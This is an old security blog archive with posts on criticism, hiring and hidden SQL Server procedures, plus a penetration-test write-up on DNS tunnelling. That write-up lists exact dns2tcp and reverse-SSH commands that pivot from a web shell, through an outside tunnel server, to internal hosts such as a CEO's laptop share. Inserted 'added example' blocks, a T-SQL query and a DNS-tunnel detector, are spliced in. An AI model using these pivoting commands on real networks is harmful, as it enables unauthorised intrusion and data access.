Mon, 7 Dec 2009

Criticism, Cheerleading, and Negativity

[Alex Payne] has an excellent post up titled "Criticism, Cheerleading, and Negativity". It's a 2 minute read, but it's worth it:

"

We understand well the idea of being in favor of something, or against something, but we don't particularly understand how criticism fits into this dichotomy.

..

The reason a person is critical of a thing is because he is passionate about that thing. In order to have a critical opinion, you have to love something enough to understand it, and then love it so much more that you want it to be better. Passion breeds critical thinking.

..

“That sucks” is negativity. “That sucks, here's why, and here's how to fix it” is criticism, and it comes from a place of love. That's the difference.

Everyone says they're comfortable with criticism and with critics, because not being able to handle criticism is a sign of immaturity. What people really want, though, are cheerleaders. Nowhere in life is this more true than in business.

A healthy business needs passionate employees to succeed. Critics are the most passionate people you can find, but we're conditioned to assume that critics are negative curmudgeons with nothing more than slings and arrows to contribute. So rather than seeking out critics, employers seek out cheerleaders.

"

Read the article.. it's worth it..

Fri, 5 Jun 2009

Two quick links on "how your app got hacked, even though it looked ok"

The first one from hacker news, aptly titled "How I Hacked Hacker News (with arc security advisory)"

and the second, a welcome-back-to-the-blogosphere tptacek post on the Matasano blog: [Typing The Letters A-E-S Into Your Code? You're Doing It Wrong!]

/mh

PS. For those going "man, I wish someone would break down the important crypto stuff for me in a way that's understandable without being patronizing", there is Chris Eng and his OWASP talk on [Cryptography For Penetration Testers].

Wed, 4 Feb 2009

On Hiring Staff - The T-Shirt Method..

Anyone who has honestly reflected on what they know about hiring will tell you that no matter how locked-down you think you have it, you don't. There is still way too much left to chance and way too much that you just don't know. To avoid this, companies that care about preserving their culture will sometimes adopt a "default deny" approach: it's ok to miss a potentially good hire rather than to take on a bad one. This isn't silly geek risk aversion.. It's because one bad hire can do amazing damage to a culture (an area bad hires can be amazingly productive in).

We have been hiring and interviewing people for about 7 years and have learned many lessons along the way, but without fail the one that works best for me is the T-Shirt test.

The T-Shirt test is simply to ask yourself: "how will I feel standing at a conference, with this guy next to me wearing my company T-Shirt?". If you don't like the thought, you shouldn't make the hire.

Now this doesn't translate to only hiring good looking people (but if what's important to you when standing up at a conference is the looks of the person next to you, you probably don't read this blog). The immediate question that comes up is "what if the guy is a real rockstar, but isn't presentable?". In truth, I'm happy with that, and far prefer it to a very presentable GQ model with the brain of a pea.

The T-Shirt question is a good evaluation of how you feel about the candidate, and personally I can tell you that every time I have ignored it, I have kicked myself a little later.

Interestingly enough, this doesn't have to be just for tech-geeks. If you are sitting at a management level or at a board level, the same question applies, i.e. how do I feel about standing next to this person at X, and how do I feel about him representing me / my brand? If your answer isn't positive, either he shouldn't be there, or you shouldn't..

/mh

Tue, 15 Jul 2008

SQL Server 2005 - Where the $%#@ is that stored proc ?

While doing some prodding on SQL Server, I came across this newness (of course this is probably old hat to many SQL 2005 DBAs).

Essentially I was trying to track down something in sp_addserver.

The source of this stored proc [System Databases\Master\System Stored Procedures\sys.sp_addserver] showed that another stored proc called: sys.sp_MSaddserver_internal was being called.

For the life of me though, I could not track down sys.sp_MSaddserver_internal.

Turns out the answer is reasonably well documented [SQL Books Online]: with 2005, MSFT moved stored procs and friends into a read-only hidden db. This can be made visible by copying the physical .mdf files and attaching them. [Process reasonably documented on the interwebs if you know what to search for]

This effectively will allow you to do a:

    use Resource_Copy
    go
    select name from sys.objects where name like '%MS%internal%'

to reveal the missing procs for you to examine/tinker with.
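The attach-and-query step written out in T-SQL, as an added illustration that is not from the original post. It assumes the copied files are the SQL Server 2005 Resource database files (mssqlsystemresource.mdf/.ldf) placed at the placeholder paths below, and extends the post's query with a join to sys.sql_modules so the source text of each internal proc comes back alongside its name.

```sql
-- Added example, not from the original post. The paths below are assumed
-- placeholders for wherever the copied Resource database files were put;
-- the copy is attached under a new name so the live hidden db is untouched.
CREATE DATABASE Resource_Copy
ON (FILENAME = N'C:\sqlcopy\mssqlsystemresource.mdf'),
   (FILENAME = N'C:\sqlcopy\mssqlsystemresource.ldf')
FOR ATTACH;
GO

USE Resource_Copy;
GO

-- List the internal procs the post went looking for, together with their
-- source text, so sp_MSaddserver_internal and friends can be read directly.
SELECT o.name, o.type_desc, m.definition
FROM sys.objects AS o
JOIN sys.sql_modules AS m ON m.object_id = o.object_id
WHERE o.name LIKE '%MS%internal%'
ORDER BY o.name;
GO
```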

Thu, 28 Feb 2008

DNS Tunnels (RE-REDUX)

On a recent assessment we came across the following scenario:

1) We have command execution through a web command interpreter script (cmd.jsp) on a remote Linux webserver

2) The box is firewalled, only allowing 53 UDP ingress and egress

3) The box is sitting on the network perimeter, with one public IP and one internal IP, and not in a DMZ

So we want to tunnel from the SensePost offices to Target Company's internal machines, with this pretty restrictive setup. How did we accomplish this?

1) Upload and compile dns2tcp to the target machine

2) Create a dns2tcp tunnel from target (dns2tcp client) to SPDNSTUNNEL (dns2tcp server)

  • SPDNSTUNNEL is running a dns2tcp server offering two services, ssh and proxy. The dns2tcp client can connect from target to SPDNSTUNNEL's ssh or proxy ports over its 'TCP' channel. This is done with the following command, where we set up target to listen locally on 55555:
    • ./dns2tcpc -z mooo.mooo.moooo -r ssh -l 55555 SPDNSTUNNEL.sensepost.com
    • (Creating Target:55555 ---TCP/53---> SPDNSTUNNEL:sshPort).
3) Create an SSH tunnel from target to SPDNSTUNNEL, forwarding traffic from SPDNSTUNNEL through target to the internal network
  • Since we have a non-interactive shell on the webserver we needed to create this tunnel with a single command with no prompts. We created a dummy user on SPDNSTUNNEL and created ssh keys for it. We uploaded the ssh keys to target and, by issuing the following command through an uploaded bash script, ssh-ed into SPDNSTUNNEL through the DNS tunnel:
    • ssh -i /tmp/key -p 55555 -l tunnelUser -R 4444:intranetserver.target.com:80 -o "stricthostkeychecking=no" 127.0.0.1
4) What do we have now? We have SPDNSTUNNEL listening on 4444. Connections made to SPDNSTUNNEL on 4444 will connect to intranetserver.target.com on port 80. So the final step is to create a tunnel from our assessment laptop to SPDNSTUNNEL's 4444, allowing us to connect to the target's internal network from the comfort of our SensePost pods:
  • Linux :: [glenn@localhost] ssh -L 3333:localhost:4444 SPDNSTUNNEL.sensepost.com -l glenn
  • Windows :: Use putty's ssh tunnel option, setting "Source port" to 3333 and destination to "localhost:4444"
5) Now, if we want to connect to a different target internal machine, what do we need to do with the above London Underground of tunnels? We need only change the exit point of the compromised target machine's tunnel; all the other tunnels stay intact. So we leave the DNS tunnel in place, and tear down the SSH tunnel by executing the following on SPDNSTUNNEL:
  • ps aux | grep ssh | egrep '^tunnelUser' | cut -f 3 -d " " | xargs kill ; clear ; tail -f /var/log/secure
    • (tailing /var/log/secure is useful: upon executing the ssh command on target we should see a connect from tunnelUser)
..and create a new ssh tunnel by executing a modified .sh script with the following in it from the target machine:
  • ssh -i /tmp/key -p 55555 -l tunnelUser -R 4444:CEO_laptop.target.com:139 -o "stricthostkeychecking=no" 127.0.0.1
As you can see, the only change in the whole setup is the internal target machine and port in this one command. We can now connect to the CEO's laptop's samba share by smbclient-ing to our assessment laptop on port 3333.

See the attached picture for a summary of the above.
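Seen from the network defender's side, the traffic this setup generates (a steady stream of queries from one host to one zone, carried in payload-bearing record types with encoded leading labels) is exactly what a DNS tunnel detection keys on. Added example, not part of the original post: a small detector run over constructed DNS query log lines; the log format, the thresholds and the last-two-labels zone heuristic are all assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample log (not real traffic), one query per line:
# "<unix_ts> <client_ip> <qtype> <qname>". 10.0.0.5 browses normally;
# 10.0.0.9 behaves like a dns2tcp client talking to its tunnel zone.
SAMPLE_LOG = """\
1204000001 10.0.0.5 A www.example.com
1204000002 10.0.0.5 A mail.example.com
1204000003 10.0.0.5 AAAA www.example.com
1204000001 10.0.0.9 TXT a8f3k2d9x1q7zz4b.mooo.mooo.moooo
1204000001 10.0.0.9 TXT b7e2j1c8w0p6yy3a.mooo.mooo.moooo
1204000002 10.0.0.9 TXT c6d1i0b7v9o5xx2z.mooo.mooo.moooo
1204000002 10.0.0.9 TXT d5c0h9a6u8n4ww1y.mooo.mooo.moooo
1204000003 10.0.0.9 TXT e4b9g8z5t7m3vv0x.mooo.mooo.moooo
"""

TUNNEL_QTYPES = {"TXT", "KEY", "NULL"}  # record types tunnels carry data in

def label_entropy(label):
    """Shannon entropy in bits/char of one DNS label; encoded data scores high."""
    n = len(label)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(label.lower()).values())

def zone_key(qname):
    """Approximate the tunnel zone by the last two labels (assumed heuristic)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def find_tunnel_candidates(log_text, min_queries=5, min_entropy=3.0, min_frac=0.5):
    """Return {(client, zone): stats} for pairs that look like a DNS tunnel: many
    queries to one zone, dominated by tunnel record types or encoded labels."""
    stats = defaultdict(lambda: {"n": 0, "tunnel_types": 0, "entropy_sum": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # tolerate malformed lines instead of aborting the scan
        _, client, qtype, qname = parts
        s = stats[(client, zone_key(qname))]
        s["n"] += 1
        s["tunnel_types"] += int(qtype.upper() in TUNNEL_QTYPES)
        s["entropy_sum"] += label_entropy(qname.split(".")[0])
    flagged = {}
    for key, s in stats.items():
        frac, ent = s["tunnel_types"] / s["n"], s["entropy_sum"] / s["n"]
        if s["n"] >= min_queries and (frac >= min_frac or ent >= min_entropy):
            flagged[key] = {"queries": s["n"], "tunnel_frac": frac, "mean_entropy": ent}
    return flagged
```

On the constructed log only the 10.0.0.9 / mooo.moooo pair is flagged; real deployments would tune the thresholds against a baseline of the site's normal resolver traffic.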

-Glenn

tunnels_tunnels_FakeExample2.png